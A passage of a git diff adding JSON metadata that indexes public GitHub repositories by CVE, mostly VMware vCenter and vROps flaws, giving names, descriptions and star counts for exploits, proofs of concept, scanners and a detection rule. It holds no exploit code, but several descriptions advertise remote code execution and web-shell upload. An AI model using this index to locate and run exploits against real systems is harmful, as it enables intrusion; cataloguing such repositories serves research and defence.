489669248, + "name": "westone-CVE-2022-1388-scanner", + "full_name": "Osyanina\/westone-CVE-2022-1388-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2022-1388-scanner", + "description": "A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.", + "fork": false, + "created_at": "2022-05-07T12:36:41Z", + "updated_at": "2022-05-07T12:37:01Z", + "pushed_at": "2022-05-07T12:41:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21983.json b/2021/CVE-2021-21983.json new file mode 100644 index 0000000000..188b13351e --- /dev/null +++ b/2021/CVE-2021-21983.json @@ -0,0 +1,33 @@ +[ + { + "id": 470562831, + "name": "CVE-2021-21983", + "full_name": "murataydemir\/CVE-2021-21983", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-21983", + "description": "[CVE-2021-21983] VMware vRealize Operations (vROps) Manager API Arbitrary File Write Leads to Remote Code Execution (RCE)", + "fork": false, + "created_at": "2022-03-16T11:56:25Z", + "updated_at": "2024-08-12T20:21:36Z", + "pushed_at": "2022-03-16T13:08:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21985.json b/2021/CVE-2021-21985.json new file mode 100644 index 0000000000..348d57d975 --- /dev/null +++ b/2021/CVE-2021-21985.json @@ -0,0 +1,323 @@ +[ + { + "id": 371223609, + "name": "CVE-2021-21985", + "full_name": "bigbroke\/CVE-2021-21985", + "owner": { + "login": "bigbroke", + "id": 77472382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77472382?v=4", + "html_url": "https:\/\/github.com\/bigbroke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigbroke\/CVE-2021-21985", + "description": "Multiple vulnerabilities in the vSphere Client (HTML5) were privately reported to VMware. Updates and workarounds are available to address these vulnerabilities in affected VMware products.", + "fork": false, + "created_at": "2021-05-27T02:28:48Z", + "updated_at": "2021-05-27T14:19:48Z", + "pushed_at": "2021-05-27T02:30:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 371975592, + "name": "CVE-2021-21985_PoC", + "full_name": "alt3kx\/CVE-2021-21985_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-21985_PoC", + "description": null, + "fork": false, + "created_at": "2021-05-29T13:07:14Z", + "updated_at": "2024-09-19T11:52:59Z", + "pushed_at": "2023-01-19T16:24:33Z", + "stargazers_count": 214, + "watchers_count": 214, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 214, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 372757311, + "name": "CVE-2021-21985-Checker", + "full_name": "onSec-fr\/CVE-2021-21985-Checker", + "owner": { + "login": "onSec-fr", + "id": 59887731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59887731?v=4", + "html_url": "https:\/\/github.com\/onSec-fr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/onSec-fr\/CVE-2021-21985-Checker", + "description": "CVE-2021-21985 Checker.", + "fork": false, + "created_at": "2021-06-01T08:31:05Z", + "updated_at": "2023-05-05T16:11:50Z", + "pushed_at": "2021-06-01T08:32:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 372936761, + "name": "CVE-2021-21985", + "full_name": "mauricelambert\/CVE-2021-21985", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-21985", + "description": "This script check the CVE-2021-21985 vulnerability and patch on vCenter Server.", + "fork": false, + "created_at": "2021-06-01T19:12:29Z", + "updated_at": "2021-06-01T19:16:35Z", + "pushed_at": "2021-06-01T19:13:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-21985", + "python3", + "security", + "security-scan", + "vcenter" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 373496154, + "name": "cve-2021-21985_exp", + "full_name": "xnianq\/cve-2021-21985_exp", + "owner": { + "login": "xnianq", + "id": 17513849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17513849?v=4", + "html_url": "https:\/\/github.com\/xnianq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xnianq\/cve-2021-21985_exp", + "description": "cve-2021-21985 exploit", + "fork": false, + "created_at": "2021-06-03T12:17:06Z", + "updated_at": "2024-11-21T01:00:36Z", + "pushed_at": "2022-01-10T07:01:58Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 113, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 373684696, + "name": "CVE-2021-21985", + "full_name": "daedalus\/CVE-2021-21985", + "owner": { + "login": "daedalus", + "id": 115175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115175?v=4", + "html_url": "https:\/\/github.com\/daedalus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daedalus\/CVE-2021-21985", + "description": "CVE-2021-21985 vmware 6.7-9.8 RCE", + "fork": false, + "created_at": "2021-06-04T01:15:14Z", + "updated_at": "2024-11-15T19:24:39Z", + "pushed_at": "2023-11-27T18:36:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-21985", + "rce", + "vmware" + ], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 374091686, + "name": "Project_CVE-2021-21985_PoC", + "full_name": "testanull\/Project_CVE-2021-21985_PoC", + "owner": { + "login": "testanull", + "id": 21060210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21060210?v=4", + "html_url": "https:\/\/github.com\/testanull", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/testanull\/Project_CVE-2021-21985_PoC", + "description": null, + "fork": false, + "created_at": "2021-06-05T11:03:13Z", + "updated_at": "2024-11-07T02:24:18Z", + "pushed_at": "2021-06-07T04:00:06Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 31, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 384003238, + "name": "CVE-2021-21985", + "full_name": "haidv35\/CVE-2021-21985", + "owner": { + "login": "haidv35", + "id": 20736458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20736458?v=4", + "html_url": "https:\/\/github.com\/haidv35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haidv35\/CVE-2021-21985", + "description": null, + "fork": false, + "created_at": "2021-07-08T04:45:19Z", + "updated_at": "2023-03-08T02:48:17Z", + "pushed_at": "2021-07-12T11:04:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 385047792, + "name": "CVE-2021-21985", + "full_name": "aristosMiliaressis\/CVE-2021-21985", + "owner": { + "login": "aristosMiliaressis", + "id": 11355060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11355060?v=4", + "html_url": "https:\/\/github.com\/aristosMiliaressis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aristosMiliaressis\/CVE-2021-21985", + "description": "cve-2021-21985 powershell poc", + "fork": false, + "created_at": "2021-07-11T20:38:19Z", + "updated_at": "2024-06-21T00:09:25Z", + "pushed_at": "2021-07-11T20:39:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 426353517, + "name": "CVE-2021-21985_PoC", + "full_name": "sknux\/CVE-2021-21985_PoC", + "owner": { + "login": "sknux", + "id": 45546882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45546882?v=4", + "html_url": "https:\/\/github.com\/sknux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sknux\/CVE-2021-21985_PoC", + "description": "VMWARE VCENTER SERVER VIRTUAL SAN HEALTH CHECK PLUG-IN RCE (CVE-2021-21985) ", + "fork": false, + "created_at": "2021-11-09T19:06:29Z", + "updated_at": "2022-01-18T15:09:25Z", + "pushed_at": "2021-11-09T19:14:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22.json b/2021/CVE-2021-22.json new file mode 100644 index 0000000000..db8c2ba3f9 --- /dev/null +++ b/2021/CVE-2021-22.json @@ -0,0 +1,33 @@ +[ + { + "id": 615475256, + "name": "CVE-2021-22-555", + "full_name": "LingerANR\/CVE-2021-22-555", + "owner": { + "login": "LingerANR", + "id": 31801397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31801397?v=4", + "html_url": "https:\/\/github.com\/LingerANR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LingerANR\/CVE-2021-22-555", + "description": null, + "fork": false, + "created_at": "2023-03-17T19:32:45Z", + "updated_at": "2023-03-17T19:38:26Z", + "pushed_at": "2023-03-17T19:38:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22005.json b/2021/CVE-2021-22005.json new file mode 100644 index 0000000000..9006d8e427 --- /dev/null +++ b/2021/CVE-2021-22005.json @@ -0,0 +1,343 @@ +[ + { + "id": 409392445, + "name": "CVE-2021-22005", + "full_name": "1ZRR4H\/CVE-2021-22005", + "owner": { + "login": "1ZRR4H", + "id": 42696639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42696639?v=4", + "html_url": "https:\/\/github.com\/1ZRR4H", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1ZRR4H\/CVE-2021-22005", + "description": null, + "fork": false, + "created_at": "2021-09-23T00:09:03Z", + "updated_at": "2023-12-29T05:43:57Z", + "pushed_at": "2021-09-23T00:10:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 409444571, + "name": "Sigma-Rule-for-CVE-2021-22005-scanning-activity", + "full_name": "pisut4152\/Sigma-Rule-for-CVE-2021-22005-scanning-activity", + "owner": { + "login": "pisut4152", + "id": 72641661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72641661?v=4", + "html_url": "https:\/\/github.com\/pisut4152", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pisut4152\/Sigma-Rule-for-CVE-2021-22005-scanning-activity", + "description": null, + "fork": false, + "created_at": "2021-09-23T04:14:05Z", + "updated_at": "2024-08-12T20:16:38Z", + "pushed_at": "2021-09-23T04:21:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 409794887, + "name": "VMWare-CVE-Check", + "full_name": "Jeromeyoung\/VMWare-CVE-Check", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/VMWare-CVE-Check", + "description": "CVE-2021-22005", + "fork": false, + "created_at": "2021-09-24T01:31:29Z", + "updated_at": "2021-09-24T01:31:30Z", + "pushed_at": "2021-09-23T20:01:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410204640, + "name": "CVE-2021-22005-", + "full_name": "5gstudent\/CVE-2021-22005-", + "owner": { + "login": "5gstudent", + "id": 37172754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37172754?v=4", + "html_url": "https:\/\/github.com\/5gstudent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5gstudent\/CVE-2021-22005-", + "description": "CVE-2021-22005批量验证python脚本", + "fork": false, + "created_at": "2021-09-25T07:19:42Z", + "updated_at": "2024-09-15T12:36:18Z", + "pushed_at": "2021-09-25T07:58:15Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410727345, + "name": "CVE-2021-22005_PoC", + "full_name": "RedTeamExp\/CVE-2021-22005_PoC", + "owner": { + "login": "RedTeamExp", + "id": 74718678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74718678?v=4", + "html_url": "https:\/\/github.com\/RedTeamExp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedTeamExp\/CVE-2021-22005_PoC", + "description": "CVE-2021-22005_PoC", + "fork": false, + "created_at": "2021-09-27T03:18:09Z", + "updated_at": "2021-12-18T07:16:48Z", + "pushed_at": "2021-09-27T03:18:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 411438681, + "name": "CVE-2021-22005", + "full_name": "rwincey\/CVE-2021-22005", + "owner": { + "login": "rwincey", + "id": 5438659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4", + "html_url": "https:\/\/github.com\/rwincey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwincey\/CVE-2021-22005", + "description": null, + "fork": false, + "created_at": "2021-09-28T21:06:59Z", + "updated_at": "2024-07-29T01:48:52Z", + "pushed_at": "2021-09-28T21:08:21Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 36, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 412724557, + "name": "CVE-2021-22005-metasploit", + "full_name": "TaroballzChen\/CVE-2021-22005-metasploit", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-22005-metasploit", + "description": "the metasploit script(POC\/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability", + "fork": false, + "created_at": "2021-10-02T07:32:04Z", + "updated_at": "2024-08-12T20:16:53Z", + "pushed_at": "2021-10-02T08:21:38Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 420817779, + "name": "CVE-2021-22005", + "full_name": "tiagob0b\/CVE-2021-22005", + "owner": { + "login": "tiagob0b", + "id": 24528913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24528913?v=4", + "html_url": "https:\/\/github.com\/tiagob0b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiagob0b\/CVE-2021-22005", + "description": null, + "fork": false, + "created_at": "2021-10-24T23:14:01Z", + "updated_at": "2022-11-09T18:14:11Z", + "pushed_at": "2021-10-24T23:14:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421739207, + "name": "CVE-2021-22005", + "full_name": "Jun-5heng\/CVE-2021-22005", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-22005", + "description": "VMware vCenter Server任意文件上传漏洞 \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2021-10-27T08:36:21Z", + "updated_at": "2024-10-28T02:18:43Z", + "pushed_at": "2022-07-08T09:17:14Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439563239, + "name": "cve-2021-22005-exp", + "full_name": "shmilylty\/cve-2021-22005-exp", + "owner": { + "login": "shmilylty", + "id": 24275308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24275308?v=4", + "html_url": "https:\/\/github.com\/shmilylty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shmilylty\/cve-2021-22005-exp", + "description": null, + "fork": false, + "created_at": "2021-12-18T08:18:50Z", + "updated_at": "2024-11-27T01:07:41Z", + "pushed_at": "2021-12-22T10:32:37Z", + "stargazers_count": 189, + "watchers_count": 189, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 189, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 505737586, + "name": "cve-2021-22005", + "full_name": "InventorMAO\/cve-2021-22005", + "owner": { + "login": "InventorMAO", + "id": 43470113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43470113?v=4", + "html_url": "https:\/\/github.com\/InventorMAO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InventorMAO\/cve-2021-22005", + "description": "cve-2021-22005vcenter任意文件上传漏洞,可直接上传冰蝎", + "fork": false, + "created_at": "2022-06-21T07:36:01Z", + "updated_at": "2022-06-21T07:37:49Z", + "pushed_at": "2022-06-21T07:37:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22006.json b/2021/CVE-2021-22006.json new file mode 100644 index 0000000000..cfd6b0dfd9 --- /dev/null +++ b/2021/CVE-2021-22006.json @@ -0,0 +1,33 @@ +[ + { + "id": 410416072, + "name": "CVE-2021-22006", + "full_name": "CrackerCat\/CVE-2021-22006", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-22006", + "description": "CVE-2021-22005 - VMWare vCenter Server File Upload to RCE", + "fork": false, + "created_at": "2021-09-26T01:02:00Z", + "updated_at": "2024-08-12T20:16:43Z", + "pushed_at": "2023-01-30T10:11:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22015.json b/2021/CVE-2021-22015.json new file mode 100644 index 0000000000..35f6d7391e --- /dev/null +++ b/2021/CVE-2021-22015.json @@ -0,0 +1,33 @@ +[ + { + "id": 411962225, + "name": "vScalation-CVE-2021-22015", + "full_name": "PenteraIO\/vScalation-CVE-2021-22015", + "owner": { + "login": "PenteraIO", + "id": 60603602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60603602?v=4", + "html_url": "https:\/\/github.com\/PenteraIO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenteraIO\/vScalation-CVE-2021-22015", + "description": "Scanner for vScalation (CVE-2021-22015) a Local Privilege Escalation in VMWare vCenter", + "fork": false, + "created_at": "2021-09-30T07:16:27Z", + "updated_at": "2024-02-24T11:42:35Z", + "pushed_at": "2023-05-09T12:43:17Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22053.json b/2021/CVE-2021-22053.json new file mode 100644 index 0000000000..77fed9bb3e --- /dev/null +++ b/2021/CVE-2021-22053.json @@ -0,0 +1,64 @@ +[ + { + "id": 430315623, + "name": "spring-cloud-netflix-hystrix-dashboard-cve-2021-22053", + "full_name": "SecCoder-Security-Lab\/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053", + "owner": { + "login": "SecCoder-Security-Lab", + "id": 92973688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92973688?v=4", + "html_url": "https:\/\/github.com\/SecCoder-Security-Lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecCoder-Security-Lab\/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053", + "description": "Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053", + "fork": false, + "created_at": "2021-11-21T08:47:56Z", + "updated_at": "2024-08-12T20:18:15Z", + "pushed_at": "2022-12-15T07:44:59Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430821052, + "name": "CVE-2021-22053", + "full_name": "Vulnmachines\/CVE-2021-22053", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-22053", + "description": " CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability", + "fork": false, + "created_at": "2021-11-22T18:26:16Z", + "updated_at": "2023-02-22T15:16:08Z", + "pushed_at": "2022-07-26T05:22:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22054.json b/2021/CVE-2021-22054.json new file mode 100644 index 0000000000..7e29e8c3a6 --- /dev/null +++ b/2021/CVE-2021-22054.json @@ -0,0 +1,39 @@ +[ + { + "id": 499534375, + "name": "CVE-2021-22054", + "full_name": "MKSx\/CVE-2021-22054", + "owner": { + "login": "MKSx", + "id": 17793927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17793927?v=4", + "html_url": "https:\/\/github.com\/MKSx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MKSx\/CVE-2021-22054", + "description": "Generate SSRF payloads", + "fork": false, + "created_at": "2022-06-03T14:06:02Z", + "updated_at": "2024-10-11T17:48:32Z", + "pushed_at": "2022-06-03T19:16:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "airwatch", + "cve", + "cve-2021-22054", + "python", + "vmware" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22119.json b/2021/CVE-2021-22119.json new file mode 100644 index 0000000000..0d8ec3f6b0 --- /dev/null +++ b/2021/CVE-2021-22119.json @@ -0,0 +1,33 @@ +[ + { + "id": 423893864, + "name": "oauth-client-exploit", + "full_name": "mari6274\/oauth-client-exploit", + "owner": { + "login": "mari6274", + "id": 8080682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8080682?v=4", + "html_url": "https:\/\/github.com\/mari6274", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mari6274\/oauth-client-exploit", + "description": "Applications that reproduce CVE-2021-22119", + "fork": false, + "created_at": "2021-11-02T15:16:24Z", + "updated_at": "2022-11-09T18:14:17Z", + "pushed_at": "2021-11-02T15:17:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22123.json b/2021/CVE-2021-22123.json new file mode 100644 index 0000000000..463cf571b4 --- /dev/null +++ b/2021/CVE-2021-22123.json @@ -0,0 +1,33 @@ +[ + { + "id": 397567325, + "name": "CVE-2021-22123", + "full_name": "murataydemir\/CVE-2021-22123", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-22123", + "description": "[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command Injection", + "fork": false, + "created_at": "2021-08-18T10:54:27Z", + "updated_at": "2024-08-12T20:15:42Z", + "pushed_at": "2021-08-18T13:19:38Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22145.json b/2021/CVE-2021-22145.json new file mode 100644 index 0000000000..cfe60bd847 --- /dev/null +++ b/2021/CVE-2021-22145.json @@ -0,0 +1,33 @@ +[ + { + "id": 685428734, + "name": "CVE-2021-22145-poc", + "full_name": "niceeeeeeee\/CVE-2021-22145-poc", + "owner": { + "login": "niceeeeeeee", + "id": 33342959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33342959?v=4", + "html_url": "https:\/\/github.com\/niceeeeeeee", + "user_view_type": "public" + }, + "html_url": 